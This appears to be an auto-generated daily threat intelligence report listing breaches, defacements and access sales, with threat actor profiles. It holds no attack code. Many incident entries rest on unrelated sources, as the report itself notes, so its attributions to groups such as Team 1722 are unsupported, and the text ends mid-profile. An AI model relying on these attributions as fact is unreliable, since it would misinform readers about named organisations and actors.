[May-24-2025] Daily Cybersecurity Threat Report

Posted on

I. Executive Summary

The reporting period reveals a persistently active and complex cybersecurity landscape, marked by a significant interplay between hacktivist operations, geopolitical tensions, and sophisticated financially motivated cybercrime. Analysis of recent incidents indicates a sustained high level of malicious activity, with a notable increase in politically charged cyber disruptions.

Major incidents observed include data breaches and website defacements targeting governmental, educational, and critical infrastructure entities, particularly in India and Morocco. Hacktivist groups such as KAL EGY 319 and Keymous+ have been prominent in these activities, often employing defacement and data exfiltration tactics.1 While some claims of impact by these groups appear exaggerated upon closer inspection, their intent to disrupt and expose remains a significant concern.

Concurrently, highly capable state-sponsored groups, exemplified by Team 1722, a known subgroup of the infamous Sandworm, continue to conduct globally diverse cyber espionage and disruptive operations.6 These advanced persistent threats frequently leverage common vulnerabilities and infrastructure sourced from the criminal underground, demonstrating a pragmatic approach to achieving their objectives.7

The proliferation of Ransomware-as-a-Service (RaaS) models, such as BlackLock and GhostLocker, alongside the widespread deployment of commodity malware like LummaC2, underscores a robust and accessible cybercriminal ecosystem.8 This accessible infrastructure facilitates data exfiltration and extortion, highlighting a persistent and evolving threat to organizations worldwide.

A critical observation from the current threat landscape is the increasing convergence of motivations and methods among various threat actors. Traditional distinctions between state-sponsored, cybercriminal, and hacktivist groups are becoming increasingly blurred. For instance, Team 1722, while operating under a “hacktivist” moniker, is directly linked to a Russian state-sponsored entity, Sandworm (GRU Unit 74455).6 This connection illustrates how state actors may co-opt or sponsor groups that present as hacktivists to achieve strategic objectives, leveraging their agility and public-facing narratives. Similarly, groups like GhostSec, initially focused on anti-terrorism hacktivism, have engaged in Ransomware-as-a-Service operations for financial gain before announcing a return to politically motivated activities.8 This fluidity in operational models and objectives means that adversaries can pivot rapidly between different types of attacks, making attribution more complex and requiring organizations to adopt a more adaptable defense posture.

This convergence also means that geopolitical tensions can directly translate into cyber threats from unexpected sources. Hacktivist groups, often driven by political or social agendas, can quickly mobilize in response to real-world events, as seen with Keymous+ and KAL EGY 319 in the India-Pakistan cyber conflict.3 Their actions, even if technically unsophisticated, contribute to a climate of disruption and can serve as a smokescreen for more advanced, persistent threats. The reliance on readily available exploits and commodity malware by a diverse range of actors, from less sophisticated individuals to highly resourced state-backed groups, indicates that unpatched and poorly secured systems remain prime targets. The vibrant dark web marketplace further exacerbates this situation by providing a readily available platform for the sale of compromised data and access, fueling the cybercrime economy and underscoring the critical need for enhanced monitoring and proactive defensive measures.12

II. Daily Incident Overview

This section provides a detailed breakdown of reported cybersecurity incidents. It is important to note that for several incidents, the provided research material offers general information or refers to unrelated entities, rather than specific details of the breach itself. These discrepancies are highlighted where relevant.

Incident 1: Public Grievance Redressal System Maharashtra Data Breach

  • Affected Organization/Sector: The Public Grievance Redressal System, operated by the Government of Maharashtra, India (Government sector).15 This digital platform is designed to facilitate citizens in lodging and tracking grievances, with the aim of ensuring timely and effective resolution.15
  • Date & Time of Discovery/Attack: The specific date and time of the incident are not detailed in the provided information. The website copyright indicates “© 2025 Content Owned by Government of Maharashtra,” suggesting it is an active and current system.15
  • Nature of Attack: The incident is categorized as a data breach. However, the specific methods of intrusion or the nature of the breach are not elaborated upon in the available research material.
  • Key Impact & Compromised Data: The provided information describes the system’s functionality, noting its success in resolving a significant percentage of citizen complaints (90% resolved out of 95,900 received complaints).15 Despite the query’s categorization, no specific details regarding the impact of this particular data breach or the types of data compromised are present in the provided snippets.
  • Identified Threat Actor(s): Team 1722. While the query attributes this incident to “Team 1722 impact,” the research material does not provide specific details linking Team 1722 to this particular data breach.
  • References:
  • Published URL: https://grievances.maharashtra.gov.in/en 15
  • Screenshots: No specific screenshot links are provided in the research material.

Incident 2: Al-Dail Real Estate Defacement

  • Affected Organization/Sector: Al-Dail Real Estate (Real Estate sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: The incident is described as a website defacement. This type of attack typically involves unauthorized modification of a website’s visual appearance, content, or functionality, often executed for publicity, political messaging, or to demonstrate hacking capabilities.16
  • Key Impact & Compromised Data: The provided snippets 17 consist of generic government or legislative documents and do not contain any specific information regarding the defacement of “Al-Dail Real Estate” or any data compromised during the incident.
  • Identified Threat Actor(s): Team 1722. The research material does not confirm this attribution or provide any details of Team 1722’s involvement in this specific defacement.
  • References:
  • Published URL: https://house.texas.gov/index.php 17, https://www.legis.iowa.gov/docs/publications/ICV/713266.pdf 18
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URLs provided in the research material for this incident lead to unrelated government websites (Texas House of Representatives and Iowa Legislature documents), not to “Al-Dail Real Estate” or any report detailing its defacement. This indicates a lack of direct supporting material for this specific incident within the provided data.

Incident 3: Art Line Life Srl Defacement

  • Affected Organization/Sector: Art Line Life Srl. The sector is unclear from the name, but the associated snippets discuss medical devices, potentially linking it to the healthcare or life sciences sector.19
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: The incident is described as a website defacement.
  • Key Impact & Compromised Data: The provided snippets 19 detail information about arterial lines and the Bausch + Lomb Stellaris Elite™ vision enhancement system, describing their functions and intended use. However, they offer no information about the defacement of “Art Line Life Srl” or any data compromised as a result.
  • Identified Threat Actor(s): Elite Squad. As identified in the threat actor profiles, “Elite Squad” is likely a reference to “Ghost Squad Hackers”.21 However, the provided snippets do not link Ghost Squad Hackers to this specific incident.
  • References:
  • Published URL: https://litfl.com/arterial-line-and-pressure-transducer/ 19, https://ifu.bausch.com/siteassets/pdf/4135904en_web.pdf 20
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: Similar to the previous incident, the URLs provided for this incident lead to unrelated medical product information, not to “Art Line Life Srl” or any report on its defacement.

Incident 4: Kingsmen Creatives Ltd. Infostealer Activity

  • Affected Organization/Sector: Kingsmen Creatives Ltd., a Singapore-headquartered group specializing in designing retail environments and conceptualizing events.22
  • Date & Time of Discovery/Attack: The infostealer activity was discovered by ransomware.live on May 14, 2025, with an estimated attack date of May 2, 2025.22
  • Nature of Attack: Infostealer activity. This type of attack involves the unauthorized collection and exfiltration of sensitive information, typically credentials, financial data, and other personal or corporate records.
  • Key Impact & Compromised Data: The incident resulted in the compromise of 2 users and 4 third-party employee credentials. No compromised employees were reported, and specific types of exfiltrated data beyond credentials are not detailed in the snippet.22
  • Identified Threat Actor(s): The “embargo” group.22
  • References:
  • Published URL: https://www.ransomware.live/id/S2luZ3NtZW4gQ3JlYXRpdmVzIEx0ZC5AZW1iYXJnbw== 22
  • Screenshots: A “Leak Screenshot:” is mentioned in the snippet, but a specific URL for the screenshot is not provided.22
  • Note on Misattribution: The query referred to a “kingsman cybercrime group,” but the relevant snippet clearly attributes the attack to the “embargo” group.22 “Kingsmen Security Group” 23 is a legitimate cybersecurity consulting firm based in Washington, DC, specializing in IT security and compliance, and is not related to this incident.

Incident 5: Institute of Cost Accountants of India (ICMAI) Data Breach

  • Affected Organization/Sector: The Institute of Cost Accountants of India (ICMAI), a professional and educational body in India.24
  • Date & Time of Discovery/Attack: The specific date and time of this incident are not provided in the research material.
  • Nature of Attack: The incident is categorized as a data breach.
  • Key Impact & Compromised Data: The provided snippets offer general information about ICMAI’s activities, notifications, and a webinar on cyber threats and financial frauds.24 However, they do not contain any specific details regarding the impact of a data breach on ICMAI or the types of data compromised.
  • Identified Threat Actor(s): ZEROLEGIONCREWINDONESIAN. The research material does not provide any information about this specific group or its involvement in this incident. The snippets instead discuss the “ZeroLogon” vulnerability, which is a separate technical exploit.26
  • References:
  • Published URL: https://icmai.in/ 24, https://icmai.in/upload/BI/BFSI_21_03_2025.pdf 25
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The research material does not contain information directly linking the “ZEROLEGIONCREWINDONESIAN” group to a data breach at ICMAI. The mention of “ZeroLogon” in the query context appears to be a misdirection, as the snippets discuss this as a vulnerability exploited by groups like Ryuk and RansomHub, not necessarily by the named actor.26

Incident 6: Directorate of Constitutional Bodies Audit Defacement

  • Affected Organization/Sector: Directorate of Constitutional Bodies Audit (Government sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: The incident is described as a website defacement.
  • Key Impact & Compromised Data: The provided snippets 27 are general government reports or human rights practices documents and do not contain any specific information regarding the defacement of the “Directorate of Constitutional Bodies Audit” or any data compromise.
  • Identified Threat Actor(s): GHOST’S OF GAZA. While the query attributes this incident to “GHOST’S OF GAZA impact,” the research material does not provide specific details linking this group to this particular defacement.
  • References:
  • Published URL: https://www.congress.gov/85/crecb/1958/01/16/GPO-CRECB-1958-pt1-7.pdf 27, https://www.state.gov/reports/2022-country-reports-on-human-rights-practices/turkey/ 28
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URLs provided for this incident lead to unrelated government documents, not to the “Directorate of Constitutional Bodies Audit” or a report on its defacement. This indicates a lack of direct supporting material for this specific incident within the provided data.

Incident 7: Republic of Cyprus Data Breach

  • Affected Organization/Sector: Republic of Cyprus (Government sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: The incident is categorized as a data breach.
  • Key Impact & Compromised Data: The provided snippet 32 discusses data protection laws in Tunisia, including recent reforms and adherence to international conventions, but offers no information about a data breach in the Republic of Cyprus or any compromised data.
  • Identified Threat Actor(s): Tunisian Maskers Cyber Force. The research material does not provide information about this specific group or its involvement in a data breach in Cyprus. It mentions joint cyber teams involving U.S. Army Cyber Command and Tunisian Armed Forces for defensive and offensive cyber skills enhancement during Exercise African Lion 2025.29 Anonymous, a broader hacktivist collective, has historically targeted Tunisian government websites during the Arab Spring.30
  • References:
  • Published URL: https://www.dlapiperdataprotection.com/?t=breach-notification&c=TN 32
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URL provided for this incident pertains to data protection laws in Tunisia, not to a data breach in the Republic of Cyprus. The research material lacks direct support for this specific incident.

Incident 8: Indonesian Drone Pilot Association APDI Data Breach

  • Affected Organization/Sector: Indonesian Drone Pilot Association (APDI) (Professional Association/Technology sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: The incident is categorized as a data breach.
  • Key Impact & Compromised Data: The provided snippets 33 are unrelated documents (conference proceedings and a newspaper article about Iranian army exercises) and do not contain any specific information regarding a data breach at the “Indonesian Drone Pilot Association APDI” or any data compromised.
  • Identified Threat Actor(s): gesss. The research material does not provide specific details linking “gesss” to this incident.
  • References:
  • Published URL: https://chm.ssru.ac.th/useruploads/files/20220426/a7f1b190c69f41436f30685341371f108a6dba2d.pdf 33, https://kuwaittimes.com/uploads/imported_images/pdf/2015/nov/18/kt.pdf 34
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URLs provided for this incident are entirely unrelated to the Indonesian Drone Pilot Association or a data breach. This indicates a complete lack of direct supporting material for this specific incident within the provided data.

Incident 9: Eternal Hospital Data Breach

  • Affected Organization/Sector: Eternal Hospital (Healthcare sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: The incident is categorized as a data breach.
  • Key Impact & Compromised Data: The provided snippets 35 discuss major data breaches in the U.S. healthcare sector, such as the Change Healthcare attack (affecting 190 million people in February 2024) and the Community Health Center (CHC) breach (impacting over 1 million patients in October 2024).35 These snippets highlight the significant financial and operational impacts of such breaches, including delays in patient care and the compromise of personal and health information (names, dates of birth, addresses, SSNs, medical diagnoses, treatment details).35 However, no specific details about a data breach at “Eternal Hospital” are provided.
  • Identified Threat Actor(s): KALOSHA319. The research material does not provide specific details linking “KALOSHA319” to this incident. “KALOSHA319” is identified as an Egyptian hacker, also known as KAL EGY 319, primarily involved in defacement campaigns with anti-Zionist motivations.1
  • References:
  • Published URL: https://www.bankinfosecurity.com/change-healthcares-mega-attack-1-year-later-a-27578 35, https://www.bleepingcomputer.com/news/security/data-breach-at-us-healthcare-provider-chc-impacts-1-million-patients/ 36
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URLs provided discuss other significant healthcare data breaches but do not mention “Eternal Hospital.” This indicates a lack of direct supporting material for this specific incident within the provided data.

Incident 10: European Space Agency (ESA) Data Breach

  • Affected Organization/Sector: European Space Agency (ESA) (Government/Space sector).
  • Date & Time of Discovery/Attack: The breach of ESA’s online store was identified by Sansec on December 26, 2024.38 Another incident involving Anonymous compromising ESA subdomains is also mentioned, with no specific date but implying an earlier period.39
  • Nature of Attack: The online store breach involved malicious JavaScript code embedded in the checkout process, redirecting customers to a counterfeit payment page that mimicked a legitimate Stripe interface.38 This attack leveraged domain spoofing, using “esaspaceshop.pics” instead of the official “esaspaceshop.com”.38 A separate incident involved Anonymous exploiting a blind SQL vulnerability to exfiltrate data from ESA subdomains.39
  • Key Impact & Compromised Data: For the online store breach, customer payment card details were stolen during transactions.38 The integration of the web shop with ESA’s internal systems could increase potential risks to employees and customers.38 For the Anonymous breach, personal information and login credentials of thousands of subscribers and officials were leaked, including names, emails, and clear-text passwords of over 8,000 subscribers.39
  • Identified Threat Actor(s): DataAlbumLeaks, NetSac (as per query), and Anonymous. The research material explicitly mentions Anonymous as compromising ESA subdomains for “lulz”.39 For the online store breach, the e-commerce security firm Sansec identified the malicious activity, but no specific threat actor named “DataAlbumLeaks” or “NetSac” is mentioned in relation to this incident.38
  • References:
  • Published URL: https://www.techmonitor.ai/technology/cybersecurity/cyberattack-esa-online-store-payment-card-data-stolen 38, https://www.cyberdefensemagazine.com/european-space-agency-domains-hacked-by-anonymous/ 39
  • Screenshots: No specific screenshot links are provided in the snippets.
  • Note on Discrepancy: The research material does not mention “DataAlbumLeaks” or “NetSac” in relation to the ESA cyberattacks, although it details the breach of the online store and a separate attack by Anonymous.

Incident 11: Arab Country Government Server Data Leak

  • Affected Organization/Sector: National Social Security Fund of Morocco (CNSS), a government entity in an Arab country.4
  • Date & Time of Discovery/Attack: The threat actor “Jabaroot” first appeared on cybercrime forums and Telegram on April 8, 2025, claiming responsibility for the CNSS data leak.4 The leaked dataset included timestamps from November 29, 2024.5
  • Nature of Attack: Data leak from government servers. The method of intrusion was unclear, with speculation ranging from a zero-day exploit to a compromise via third-party software.4
  • Key Impact & Compromised Data: A massive data breach at CNSS exposed a trove of sensitive information, including over 53,000 PDF files and two CSV files containing detailed records of nearly 500,000 companies and close to 2 million employees.4 The leaked data included company affiliation details, individual employee identification numbers, salaries, contact information, bank details, and personal identifiers.4 The data was often left exposed in clear text on compromised servers.4 This breach poses significant risks of fraud and identity theft for citizens.5
  • Identified Threat Actor(s): Keymous+ (as per query) and Jabaroot. The research material identifies “Jabaroot” as the threat actor claiming responsibility for this breach.4 Jabaroot stated the attack was politically motivated, in retaliation for a previous compromise of the Algerian Press Service (APS) Twitter account attributed to Moroccan-affiliated actors.4 The research material does not link Keymous+ to this specific incident.
  • References:
  • Published URL: https://cybelangel.com/our-investigation-of-the-cnss-data-leak-flash-report/ 4, https://www.resecurity.com/blog/article/cybercriminals-attacked-national-social-security-fund-of-morocco-millions-of-digital-identities-at-risk-of-data-breach 5
  • Screenshots: No specific screenshot links are provided.

Incident 12: USA Citizen Personal Data Leak

  • Affected Organization/Sector: USA citizens (Individuals).
  • Date & Time of Discovery/Attack: The query refers to a general “USA citizen personal data leak.” The research material highlights large-scale data breaches affecting US citizens, such as the National Public Data (NPD) breach in March 2024, which exposed sensitive information on approximately 1.3 billion individuals due to a misconfigured database.40
  • Nature of Attack: Data leak. The NPD breach, for example, involved a misconfigured database allowing unauthorized access.40
  • Key Impact & Compromised Data: For the NPD breach, exposed data included full names, physical addresses, dates of birth, Social Security Numbers (SSNs), phone numbers, and email addresses.40 This posed severe risks of identity theft and fraud.40
  • Identified Threat Actor(s): Jack_back (as per query). While Jack_back is a threat actor known for data leaks, including nuclear manufacturing and defense-related information 41, the provided snippets do not specifically link Jack_back to the NPD breach or a general “USA citizen personal data leak.”
  • References:
  • Published URL: https://www.corbado.com/blog/data-breaches-usa 40
  • Screenshots: No specific screenshot links are provided.

Incident 13: South Africa Corp Admin Access Sale

  • Affected Organization/Sector: A South African corporation (Corporate sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: Admin access sale. This indicates that unauthorized administrative access to a corporate system or network has been obtained and is being offered for sale, typically on underground forums.
  • Key Impact & Compromised Data: The provided snippet 44 is from the Companies and Intellectual Property Commission (CIPC) of South Africa, detailing requirements for registering businesses and changing member particulars. It does not contain any information about an admin access sale or compromised data.
  • Identified Threat Actor(s): personX (as per query). The research material provides general information about cybercrime and the FBI’s role in investigating it 42, but no specific details linking “personX” to this incident.
  • References:
  • Published URL: https://www.cipc.co.za/ 44
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URL provided for this incident is the official website for South Africa’s CIPC, which is unrelated to an admin access sale. This indicates a complete lack of direct supporting material for this specific incident within the provided data.

Incident 14: USA Corp Admin Access Sale

  • Affected Organization/Sector: A USA corporation (Corporate sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
  • Nature of Attack: Admin access sale. This indicates that unauthorized administrative access to a corporate system or network has been obtained and is being offered for sale.
  • Key Impact & Compromised Data: The provided snippet 45 is from the U.S. Small Business Administration (SBA), detailing how to register a business. It does not contain any information about an admin access sale or compromised data.
  • Identified Threat Actor(s): personX (as per query). The research material provides general information about cybercrime and the FBI’s role in investigating it 42, but no specific details linking “personX” to this incident.
  • References:
  • Published URL: https://www.sba.gov/business-guide/launch-your-business/register-your-business 45
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URL provided for this incident is the official website for the U.S. SBA, which is unrelated to an admin access sale. This indicates a complete lack of direct supporting material for this specific incident within the provided data.

Incident 15: UK Consumer Services RDP VPN Access Sale

  • Affected Organization/Sector: UK Consumer Services (Consumer Services sector).
  • Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material. However, SOCRadar’s Dark Web Team uncovered sales of UK and India government site databases and RDP access to American and Brazilian companies in the past week (as of February 5, 2024, in the snippet’s context).46
  • Nature of Attack: Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) access sale. This indicates that unauthorized access credentials for RDP and VPN services, likely providing entry into corporate networks, are being offered for sale on underground forums.
  • Key Impact & Compromised Data: The provided snippet 46 mentions a data leak from the UK’s Gambling Commission, which included user IDs, encrypted passwords, email addresses, phone numbers, and personal details for over 100 users.46 While this snippet discusses sales of RDP access for other countries, it does not specifically detail an RDP/VPN access sale for UK consumer services.
  • Identified Threat Actor(s): decider (as per query). The research material does not provide specific details linking “decider” to this incident. The term “decider” in the snippets refers to a threat actor deploying LummaC2 malware for data exfiltration 9 and also to a CISA tool for mapping adversary behavior.47 These are distinct contexts.
  • References:
  • Published URL: https://socradar.io/sales-of-american-and-brazilian-companies-rdp-access-uk-and-india-government-site-databases/ 46
  • Screenshots: No specific screenshot links are provided.
  • Note on Discrepancy: The URL provided discusses data leaks and RDP access sales for various entities, including a UK government database, but does not specifically detail an RDP/VPN access sale for UK consumer services.

III. Threat Actor Profiles

Understanding the motivations, capabilities, and typical targets of threat actors is crucial for developing effective cybersecurity strategies. The recent incidents highlight the diverse range of actors operating in the cyber domain.

Team 1722

Team 1722 is identified as an active hacktivist group, frequently mentioned alongside others like Mr Hamza and Keymous+.6 A deeper analysis reveals that Team 1722 is a subgroup within the infamous Russian state-sponsored hacking group known as Sandworm.7 Sandworm, tracked by Microsoft as Seashell Blizzard (formerly Iridium) and by the broader cybersecurity community under monikers such as APT44, Blue Echidna, and Voodoo Bear, is assessed to be affiliated with Unit 74455 within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).7

Sandworm is recognized as a highly adaptive and operationally mature threat actor, engaging in espionage, attack, and influence operations. The group has a documented history of mounting disruptive and destructive attacks, particularly against Ukraine over the past decade.7 Team 1722, as a subgroup, has been operational since at least late 2021, conducting a multi-year initial access operation dubbed “BadPilot” that has stretched across more than 15 countries globally, including North America, Europe, and parts of Africa, Asia, and Australia.7 This represents a significant expansion of Sandworm’s victimology footprint beyond its traditional concentration in Eastern Europe.7

Their methods involve exploiting various known security flaws to gain initial access, followed by post-exploitation actions aimed at credential collection, command execution, and lateral movement.7 They have weaponized vulnerabilities in software like ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) to infiltrate targets in the United Kingdom and the United States.7 Team 1722’s attacks combine opportunistic “spray and pray” techniques with targeted intrusions, designed to maintain indiscriminate access and perform follow-on actions like expanding network access or exfiltrating confidential information.7 A notable characteristic of Sandworm, and by extension its subgroups, is its reliance on Russian companies and criminal marketplaces to source and sustain offensive capabilities, highlighting a growing trend of cybercrime facilitating state-backed hacking.7

Elite Squad (Ghost Squad Hackers)

“Elite Squad” in the context of hacking groups is likely a reference to “Ghost Squad Hackers” (GSH).21 GSH is a prominent hacktivist group known for several cyberattacks, primarily driven by political motivations.21 The group is led by a de facto leader known as “s1ege” and operates as part of the larger hacktivist collective Anonymous.21

GSH has gained notoriety for targeting central banks, major news outlets like Fox News and CNN, the United States Armed Forces, and the government of Israel.21 Their past operations include defacements of the Ethiopian government in response to protests, Distributed Denial of Service (DDoS) attacks against Donald Trump’s websites for perceived racist comments, and data leaks of the Israeli Defense Force.21 They also participated in “Operation Icarus” in collaboration with Anonymous, which aimed to attack the central banking system globally, accusing banks of corruption and seeking to raise public awareness.21 During this operation, GSH claimed responsibility for attacks on the Bank of England’s email server and numerous other banking websites, including the New York Stock Exchange and the Bank of France.21 Their leader, s1ege, articulated a desire to “start an online revolution” against “elite banking cartels”.21 GSH’s tactics often involve DDoS attacks, website defacements, and data leaks, driven by their politically or socially motivated agendas.21

“embargo” group

The “embargo” group has been identified in connection with infostealer activity targeting Kingsmen Creatives Ltd., a Singapore-based company specializing in retail environments and event conceptualization.22 The incident, discovered on May 14, 2025, with an estimated attack date of May 2, 2025, involved the compromise of user accounts and third-party employee credentials.22 While specific details about the “embargo” group’s broader operations or motivations are not provided in the available research, their activity indicates a focus on credential theft, likely for financial gain or further network exploitation.

ZEROLEGIONCREWINDONESIAN

The research material does not provide specific information about a hacking group named “ZEROLEGIONCREWINDONESIAN.” However, the query links this name to a data breach at the Institute of Cost Accountants of India (ICMAI). In a related context, the “ZeroLogon” vulnerability (CVE-2020-1472) is discussed as a critical exploit used by ransomware groups like Ryuk and RansomHub to compromise Windows Active Directory domain controllers.26 This vulnerability allows attackers to bypass authentication and gain administrative control over an entire network, enabling rapid privilege escalation, data exfiltration, and ransomware deployment.26 While the name “ZEROLEGIONCREWINDONESIAN” might suggest a connection to this vulnerability or a group that exploits it, the provided snippets do not offer direct evidence for this specific attribution.

GHOST’S OF GAZA (GhostSec)

“GHOST’S OF GAZA” refers to GhostSec, a significant hacktivist group that emerged in 2015, reportedly from the remnants of the Anonymous collective.8 Initially, GhostSec’s primary objective was countering online terrorism and violent extremism, specifically targeting organizations like ISIS and Al-Qaeda.8 They aimed to disrupt propaganda efforts by identifying and attacking social media accounts, websites, and online platforms associated with these extremist groups, employing techniques such as Distributed Denial of Service (DDoS) attacks, defacement, and data breaches.8

While initially appearing neutral in the Israel-Hamas conflict, GhostSec later declared support for Palestine against perceived Israeli war crimes.8 This demonstrates their evolving political alignment. The group has also engaged in cybercriminal activities, notably launching a Ransomware-as-a-Service (RaaS) model called GhostLocker in October 2023, often collaborating with another group named Stormous.8 GhostLocker offers affiliates military-grade encryption, anti-detection features, automated data exfiltration, and multiple persistence options, with prices ranging from $999 to $1,200 USD.8 They have targeted various sectors, including technology, universities, manufacturing, transportation, and government entities, across countries in the Middle East, Africa, and Asia, including Brazil, India, China, and Israel.8

Recently, GhostSec announced a strategic shift in their operational focus, intending to cease financially motivated cybercrime services, including GhostLocker distribution, and return to hacktivism for social and political causes.8 This move, described as an “ethical exit” from cybercrime, suggests a re-prioritization of their original hacktivist motivations after accumulating sufficient funds.8

KAL EGY 319 (KALOSHA319)

KAL EGY 319, also known as “kalosha 319,” is identified as an Egyptian hacktivist group with strong anti-Zionist motivations.37 Their defacement messages explicitly state, “Let the cow slaves who support the Zionists go to hell. You supported the Zionists and attacked the Muslims. You are now under the attacks of the best in Egypt. Hacked by the Egyptian hacker kalosha 319”.37

This group predominantly focuses its efforts on India’s educational and medical sectors.1 In May 2025, KAL EGY 319 claimed approximately 31 attacks, including a widespread defacement campaign affecting around 40 Indian websites, primarily belonging to colleges, universities, and healthcare-affiliated institutions.1 Despite these assertions, investigations have revealed that the actual impact of these defacements often appears minimal, with many named websites functioning normally, suggesting that the defacements were either not fully executed or did not result in significant or complete compromise.1 Their activities are often part of a broader surge in hacktivist campaigns targeting Indian digital infrastructure, frequently echoing Pakistan state-aligned narratives.2

Keymous+

Keymous+ is a highly active hacktivist group that has been consistently involved in cyber campaigns, particularly in the India-Pakistan cyber conflict.3 They are identified as one of the most aggressive hacktivist groups, launching sustained attacks against India’s public healthcare infrastructure and targeting municipal corporations across major metropolitan regions.3 Their activities often align with Pakistan state-aligned narratives and are framed as retaliation for geopolitical events, such as India’s “Operation Sindoor”.3

Keymous+ is frequently mentioned alongside other prominent hacktivist groups like AnonSec, Nation of Saviors, and Mr Hamza, all of whom have targeted Indian organizations.3 Their methods primarily involve DDoS attacks and defacements, with Keymous+ claiming a significant percentage of attacks in 2025.3 The group’s actions underscore how cyber operations are increasingly used as tools of political messaging, blurring the lines between hacktivism and state-aligned retaliation in volatile regional contexts.4

MoilerRenoiler

The query links “MoilerRenoiler” to “malware developer” and “Morpheus Loader sale.” The provided research material discusses the career path of a malware developer, noting that such individuals require a deep understanding of computer systems and advanced mathematics.49 Malware development skills can lead to roles in malware analysis, reverse engineering, and custom threat intelligence for cybersecurity companies or corporate DFIR (Digital Forensics and Incident Response) teams.49 However, there is no specific information about an individual named “MoilerRenoiler” or a “Morpheus Loader” malware in the snippets, beyond a description of a cosmetic medical device called “Morpheus 8 RF Machine” 50, which is unrelated to cybersecurity.

Alexey Belov

“Alexey Belov” is listed as an individual under sanctions by various entities, including POL-MSWIA, OFAC, and the United Nations Organisation.51 This indicates a legal or financial restriction placed upon him. However, the provided research material does not contain any adverse media or relations linking Alexey Belov to cybercrime or the sale of vulnerable Windows drivers.51 Another individual named “Evgeniy Belov” is mentioned in a different context, related to a doping scandal in Russian athletics, which is unrelated to cybercrime.54 This suggests a potential misattribution or lack of specific cybercrime details for Alexey Belov in the provided data.

Jack_back

“Jack_back” is identified as a threat actor who joined “Darkforums” and has been involved in significant data leaks.41 This actor uploaded samples alongside a post, including employee data and nuclear equipment design files.41 The compromised data included sensitive information such as nuclear manufacturing, defense-related manufacturing, military nuclear information, submarines, blueprints, uranium mining videos and images, and employee personal information.41 This indicates a focus on industrial espionage or financially motivated attacks targeting high-value, sensitive sectors. Threat actors like “Jack_back” often operate on dark web forums, which serve as marketplaces for stolen data and illicit services.12

QualitySSN

“QualitySSN” is associated with cybercriminals who utilize stolen credentials, such as usernames and passwords, obtained through malware and social engineering.55 These criminals leverage such data to access websites, banking accounts, and cryptocurrency wallets to execute fraudulent transactions and transfer money.55 The services offered by such actors, or those claiming to recover funds from them, include tracking cheating partners, clearing criminal records, fixing bad credit scores, social media hacks, and funds recovery.55 This highlights the multifaceted nature of cybercrime, extending beyond direct financial theft to various illicit services that exploit compromised personal data, particularly Social Security Numbers (SSNs).57 The presence of SSNs on the dark web poses significant risks, enabling identity theft and fraud, necessitating actions like credit freezes and IP PINs to mitigate damage.57

ErrOr_HB

The query links “ErrOr_HB” to a “hacker” and a “defacement group.” However, the provided research snippets refer to a technical error related to the “harfbuzz” library in the context of Java OpenJDK builds and library compilation issues.58 The error typically involves missing header files or incorrect paths during software compilation.58 This indicates that “ErrOr_HB” is not a threat actor or hacking group but rather a technical term related to software development or compilation errors. This is a clear misattribution in the query.

MrRius

The query links “MrRius” to a “hacker” and a “hacker group.” However, the provided research snippets discuss the Computer Fraud and Abuse Act in the context of legal proceedings or refer to an attorney named R. Eric Hacker.60 Another snippet discusses Chinese threat actors deploying backdoors like MarsSnake, but does not mention “MrRius”.62 There is no information in the provided material that identifies “MrRius” as a cybercriminal or a hacking group. This appears to be a misattribution in the query.

gesss

“gesss” is referenced as a general “threat actor” or “hacker”.63 Threat actors are individuals or groups who carry out cyberattacks, categorized by their skill set, resources, and motivation.63 While some hackers are highly skilled and target large, protected companies, others may be less sophisticated.64 The U.S. Cybersecurity and Infrastructure Security Agency (CISA), FBI, EPA, and DoE have warned about “unsophisticated cyber actors” targeting the U.S. energy sector, exploiting poor cyber hygiene and exposed assets using “basic and elementary intrusion techniques”.65 These less sophisticated actors can still cause significant consequences, including defacement, configuration changes, operational disruptions, and even physical damage.65 This suggests that “gesss” could represent such an unsophisticated actor capable of causing substantial harm due to prevalent vulnerabilities.

personX

“personX” is a general reference to a cybercriminal or threat actor. Cybercriminals are individuals or groups who use digital technology for illegal activities, often motivated by financial gain.63 They employ tactics such as social engineering, phishing, and deploying malicious software like ransomware.42 The FBI is the lead federal agency for investigating cyberattacks and intrusions in the U.S., working to unmask malicious actors and impose consequences.42 The National Crime Agency (NCA) in the UK also focuses on cybercrime, highlighting the global nature of the threat and the importance of international collaboration.43 Common cybercrimes include identity theft, ransomware attacks, spoofing, and phishing.42 Ransomware, in particular, can have significant financial, data, and service losses, sometimes leading to business closure.43 Cybercriminals also leverage online marketplaces for selling compromised data and tools, enabling even those with basic capabilities to cause serious harm.43

decider

